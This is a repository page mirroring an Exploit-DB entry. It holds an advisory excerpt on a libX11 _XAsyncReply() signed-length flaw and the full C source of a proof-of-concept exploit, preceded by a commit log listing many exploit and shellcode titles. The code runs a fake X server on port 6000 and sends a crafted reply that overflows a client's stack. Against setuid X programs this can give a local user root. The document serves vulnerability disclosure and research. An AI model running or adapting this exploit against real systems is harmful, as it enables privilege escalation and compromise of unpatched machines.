bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/20045.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

177 lines
No EOL
6.5 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/1408/info
A vulnerability exists in the _XAsyncReply() function of libX11. This function utilizes size information retrieved as part of a client supplied packet. This value is a signed integer. By forcing this value to be negative, it becomes possible to cause stack corruption. It is further possible to use this stack corruption to overwrite the return address on the stack. In theory, this could be used to execute arbitrary code. On systems where there are setuid X applications, such as xterm, it is possible for a local user to gain root.
This code requires that the user be able to run a fake X server bound to port 6000. This requires that X not be running already. As port 6000 is not privileged, any user can bind to the socket. It appears that this attack requires local access, in order to launch the xterm.
This vulnerability has been demonstrated on versions of X from XFree86. It is believed that the same vulnerability exists in the standard X distribution XFree86 is derived from, X11R6.x, from Open Group, although this has not been confirmed.
/* Chris Evans - demo of libX11 flaw. Tricky one this. */
/* Disclaimer - I haven't bothered to beutify this. It probably is tied
* to little endian machines. Return values go unchecked, etc. ;-)
*/
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int
main(int argc, const char* argv[])
{
static int port = 6000;
char sendbuf[32768];
char recvbuf[1024];
struct sockaddr_in local_addr;
struct sockaddr_in remote_addr;
int remote_addrlen;
int listen_fd;
int accept_fd;
char c;
short s;
int i;
unsigned int bigsend;
listen_fd = socket(PF_INET, SOCK_STREAM, 6);
local_addr.sin_family = AF_INET;
local_addr.sin_addr.s_addr = INADDR_ANY;
local_addr.sin_port = htons(port);
bind(listen_fd, (struct sockaddr*)&local_addr, sizeof(local_addr));
listen(listen_fd, 1);
accept_fd = accept(listen_fd, (struct sockaddr*)&remote_addr,
&remote_addrlen);
/* Read initial client connection packet */
read(accept_fd, recvbuf, 12);
/* Absorb auth details */
s = * ((short*)&recvbuf[6]);
s += * ((short*)&recvbuf[8]);
read(accept_fd, recvbuf, s);
/* Send back the nasty reply */
/* xConnSetupPrefix */
c = 1; /* CARD8 success: xTrue */
write(accept_fd, &c, 1);
c = 0; /* BYTE lengthReason: 0 */
write(accept_fd, &c, 1);
s = 11; /* CARD16: majorVersion: 11 */
write(accept_fd, &s, 2);
s = 0; /* CARD16: minorVersion: 0 (irrelevant) */
write(accept_fd, &s, 2);
s = (32 + 40) >> 2; /* CARD16: length (of setup packet) */
write(accept_fd, &s, 2);
/* xConnSetup, 32 bytes */
i = 0; /* CARD32: release */
write(accept_fd, &i, 4);
i = 0; /* CARD32: ridBase */
write(accept_fd, &i, 4);
i = 1; /* CARD32: ridMask: 1. 0 causes 100% CPU */
write(accept_fd, &i, 4);
i = 0; /* CARD32: motionBufferSize */
write(accept_fd, &i, 4);
s = 0; /* CARD16: nbytesVendor */
write(accept_fd, &s, 2);
s = 0; /* CARD16: maxRequestSize */
write(accept_fd, &s, 2);
c = 1; /* CARD8: numRoots: need 1+ to work */
write(accept_fd, &c, 1);
c = 0; /* CARD8: numFormats */
write(accept_fd, &c, 1);
c = 0; /* CARD8: imageByteOrder */
write(accept_fd, &c, 1);
c = 0; /* CARD8: bitmapBitOrder */
write(accept_fd, &c, 1);
c = 0; /* CARD8: bitmapScanlineUnit */
write(accept_fd, &c, 1);
c = 0; /* CARD8: bit:mapScanlinePad */
write(accept_fd, &c, 1);
c = 0; /* KeyCode (CARD8): minKeyCode */
write(accept_fd, &c, 1);
c = 0; /* KeyCode (CARD8): maxKeyCode */
write(accept_fd, &c, 1);
i = 0; /* CARD32: pad */
write(accept_fd, &i, 4);
/* xWindowRoot x 1 - 40 bytes */
/* Contains a "nDepths" - no further data needed if it's set to 0 */
memset(sendbuf, '\0', 40);
write(accept_fd, sendbuf, 40);
/* read 64 bytes of X requests */
/* From:
* xCreateGC, 20 bytes + 4 bytes of values (i.e. 1)
* xQueryExtention, 20 bytes - querying for big requests
* xGetProperty, 24 bytes - querying for XA_RESOURCE_MANAGER
*/
read(accept_fd, recvbuf, 64);
/* Reply to xQueryExtension - an async reply */
c = 1; /* type (BYTE): X_Reply (1) */
write(accept_fd, &c, 1);
c = 0; /* varies */
write(accept_fd, &c, 1);
s = 2; /* sequenceNumber (CARD16): 2nd */
write(accept_fd, &s, 2);
i = -17; /* length (CARD32): signed games here */
write(accept_fd, &i, 4);
i = 0x41414141; /* pad (CARD32); 6 of them */
/* NOTE - in this program's current form, it seems to be these values
* which make their way onto the stack, overwriting a function pointer
*/
write(accept_fd, &i, 4);
write(accept_fd, &i, 4);
write(accept_fd, &i, 4);
write(accept_fd, &i, 4);
write(accept_fd, &i, 4);
write(accept_fd, &i, 4);
/* Now we've got to send a _lot_ of data back to the client - it's trying
* to read ~4Gb, grrr.
*/
c = 0;
bigsend = (unsigned int)-17;
bigsend <<= 2;
while (bigsend > 0)
{
unsigned int to_send = bigsend;
if (to_send > 32768)
{
to_send = 32768;
}
write(accept_fd, sendbuf, to_send);
bigsend -= to_send;
if (!c)
{
printf("to_go: %u\n", bigsend);
}
c++;
}
/* Send another xreply - the first 28 bytes are read onto
* the stack.
*/
/* NOTE - in its current form, these A's make their way to some unspecified
* area of stack. In testing I've easily clobbered a return address with
* these
*/
memset(sendbuf, 'A', 28);
write(accept_fd, sendbuf, 28);
memset(sendbuf, '\0', 32);
/* First char of buffer, 0, represents X_Error */
write(accept_fd, sendbuf, 32);
while(1);
}
Reference in a new issue View git blame Copy permalink